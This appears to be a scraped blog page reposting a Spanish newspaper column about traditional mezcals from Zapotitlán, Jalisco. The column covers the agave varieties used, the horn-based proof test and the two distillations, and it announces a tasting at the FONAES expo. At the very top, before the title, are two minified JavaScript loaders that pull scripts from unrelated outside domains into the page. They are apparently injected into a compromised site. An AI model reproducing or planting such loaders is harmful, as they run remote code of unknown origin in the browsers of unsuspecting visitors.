;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 103. Mezcales de Jalisco en el Palacio de los Deportes

103. Mezcales de Jalisco en el Palacio de los Deportes


En agosto de 2011 recibí del maestro tabernero Miguel Angel Partida un documento asombroso: la lista detallada de 22 mezcales tradicionales (MT) destilados por su familia en Zapotitlán, Jalisco, entre los años 2008-2011. En su elaboración fueron utilizados, ya sea de un solo tipo o combinados, los siguientes magueyes o (como llaman ahí coloquialmente a estas plantas) mezcales: Azul Telcruz, Brocha, Cimarrón, Chancuéllar, Ixtero Amarillo, Limeño y Presa Grande, siete de las 14 variedades criollas que ellos cultivan y de las que obtienen extraordinarios MT.
Muchos y muy complejos son los elementos que constituyen el gusto histórico de los MT de Zapotitlán. Uno a resaltar es el método empleado para verificar el perleado, y que recibe el nombre de graduar o cuernear el mezcal, llamado así por la sencilla razón de que se usan dos cuernos de res en los que se vierte de uno a otro el destilado para evaluar las perlas o conchas que se generan con tal acción. Otro elemento es el empleo de troncos ahuecados como parte del destilador, que pueden ser de higuera, parota o salate. Uno más: al MT se le dan dos destilaciones, la primera llamada hornos y a la segunda resaca. Por último: a un mezcal de mala calidad le dicen “chirrio”, como equivalencia de “jodido”.
Quien desee saborear estas maravillas, asista a la Expo FONAES hoy sábado a partir de las 11:30 a.m. en el Palacio de los Deportes. Allí estará Miguel Angel en el pabellón de Jalisco, pasillo 5, stand 23, presentando y vendiendo sus mezcales. De la lista mencionada, podrán saborearse MT de: 1) Ixtero Amarillo, Azul Telcruz y Brocha, julio 2008; 2) Limeño, octubre 2008; 3) Azul Telcruz., noviembre 2009; 4) Ixtero Amarillo, marzo 2010; 5) Limeño e Ixtero Amarillo, septiembre 2010; 6) Presa Grande, Ixtero Amarillo y Azul Telcruz, julio 2011; 7) Ixtero Amarillo y Azul Telcruz, febrero 2011; 8) Brocha, agosto 2011. Y, a las 17 horas se llevará a cabo una saboreada de varios de ellos. La entrada a FONAES y la saboreada son gratuitas.

http://impreso.milenio.com/node/9068758

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *